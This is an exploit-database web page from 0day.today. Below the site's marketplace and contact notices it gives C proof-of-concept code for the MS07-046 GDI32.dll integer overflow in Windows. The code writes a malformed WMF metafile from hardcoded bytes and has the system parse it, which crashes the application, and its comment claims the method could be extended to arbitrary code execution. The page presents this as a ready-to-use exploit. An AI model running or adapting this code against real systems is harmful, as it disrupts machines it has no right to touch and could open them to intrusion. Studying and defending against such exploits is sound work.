0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046)
=========================================================== MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046) =========================================================== /* * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code * by Hong Gil-Dong & Chun Woo-Chi * Yang yeon(?~1542), Korea * "I shall keep clenching my left fist unitl i see the real tao". * This POC is only for test. If an application read a malformed wmf * file like this POC, the application will be crashed. If you apply * this code, you can execute an arbitrary code. * * We tested this code on Windows XP SP2 Korean Edition * (GDI32.dll version 5.1.2600.3099). But it will work well on other * systems. */ #include <stdio.h> #include <windows.h> #define WMF_FILE "ms07-046.wmf" void usage(void); int main() { FILE *fp; char wmf[] = "\x01\x00\x09\x00\x00\x03\x11\x00\x00\x00\x00\x00"\ "\x05\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x13\x02"\ "\x32\x00\x96\x00\x03\x00\x00\x00\x00\x00"; int i; HMETAFILE srcMeta; usage(); if ((fp = fopen(WMF_FILE, "w")) == NULL) { printf("File %s write error\n", WMF_FILE); return 0; } for(i=0; i<sizeof(wmf)-1; i++) fputc(wmf[i], fp); fclose(fp); srcMeta = GetMetaFile(WMF_FILE); CopyMetaFile( srcMeta, NULL); return 0; } void usage(void) { printf("MS07-046 Windows Meta File RecordParms Integer Overflow \n"); printf("Proof of Concept by Hong Gil-Dong & Chun Woo-Chi \n"); } # 0day.today [2024-07-08] #